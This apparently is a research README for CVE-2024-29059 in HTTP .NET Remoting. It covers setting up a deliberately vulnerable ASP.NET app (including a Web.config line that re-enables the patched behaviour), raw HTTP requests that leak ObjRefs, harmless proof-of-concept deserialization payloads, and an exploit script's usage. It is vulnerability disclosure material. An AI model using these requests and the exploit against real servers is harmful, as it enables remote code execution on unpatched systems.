Leaking and Exploiting ObjRefs via HTTP .NET Remoting (CVE-2024-29059)

This repository provides further details and resources on the CODE WHITE blog post of the same name Leaking ObjRefs to Exploit HTTP .NET Remoting:

1. Creating a vulnerable ASP.NET web application
2. Detecting ObjRef leaks
3. Example deserialization payloads that work under the TypeFilterLevel.Low restrictions
4. Exploit script for delivering the payloads

1. Creating a Vulnerable ASP.NET Web Application

The following is based on Configure Application Insights for your ASP.NET website by Microsoft and describes how to create a vulnerable ASP.NET web application with Visual Studio 2019 (required to target .NET Framework 4.5.2, you can still download it at https://aka.ms/vs/16/release/vs_community.exe) and Microsoft Application Insights:

1. Open Visual Studio 2019.
2. Select File > New > Project.
3. Select ASP.NET Web Application (.NET Framework) C#, then Next.
4. Select .NET Framework 4.5.2, then Create.
5. Select Empty, then Create.
6. Select Project > Add Application Insights Telemetry.
7. Select Application Insights SDK (local), then Next.
8. Check NuGet packages, then click Finish.

If the .NET Framework updates of January 2024 are installed, open the Web.config file and add the following under /configuration/appSettings to re-enable the vulnerable behavior:

<add key="microsoft:Remoting:LateHttpHeaderParsing" value="true" />

You can then run the web application via Debug > Start Without Debugging or by pressing Ctrl+F5.

2. Detecting ObjRef Leaks

You can use the following requests to leak ObjRefs of MarshalByRefObject instances stored in the LogicalCallContext:

• BinaryServerFormatterSink:

  GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.0
  __RequestVerb: POST
  Content-Type: application/octet-stream
  

• SoapServerFormatterSink:

  GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.0
  __RequestVerb: POST
  Content-Type: text/xml
  

Leaked ObjRef URIs can then be matched using the following regex:

/[0-9a-f_]+/[0-9A-Za-z_+]+_\d+\.rem

3. Example Deserialization Payloads

We have created two simple deserialization payloads based on the TextFormattingRunProperties gadget of YSoSerial.Net with custom XAML payloads that work under the restrictions caused by TypeFilterLevel.Low to perform the following:

• HttpContext.Current.Response.AddHeader("Set-Cookie", "x=ad92afb4-00c3-4479-bab8-2425b5716081")
• HttpContext.Current.Response.RedirectLocation = "/ad92afb4-00c3-4479-bab8-2425b5716081"

The HTTP headers can be observed in the server's response to the HTTP .NET Remoting request.

4. Exploit Script

The RemoteApplicationMetadata.py script provides a way for leaking existing ObjRef and then using it in a subsequent request to deliver a given payload:

usage: RemoteApplicationMetadata.py [-h] [-c] [--chunk-range CHUNK_RANGE] [-e] [-f {binary,soap}] [-u] [-v] url [file]

positional arguments:
  url                   target URL (without `RemoteApplicationMetadata.rem`)
  file                  BinaryFormatter/SoapFormatter payload file (default: stdin)

options:
  -h, --help            show this help message and exit
  -c, --chunked         use chunked Transfer-Encoding for request
  --chunk-range CHUNK_RANGE
                        range to pick the chunk size from randomly, e. g., 1-10
  -e, --encoding        apply a random non ASCII-based encoding on SOAP
  -f {binary,soap}, --format {binary,soap}
                        targeted runtime serializer format (default: soap)
  -u, --use-generic-uri
                        use the generic `RemoteApplicationMetadata.rem` also for the payload delivery request
  -v, --verbose         print verbose info

Example:

./RemoteApplicationMetadata.py -f binary https://127.0.0.1:44365 AddHeader.bin -u -v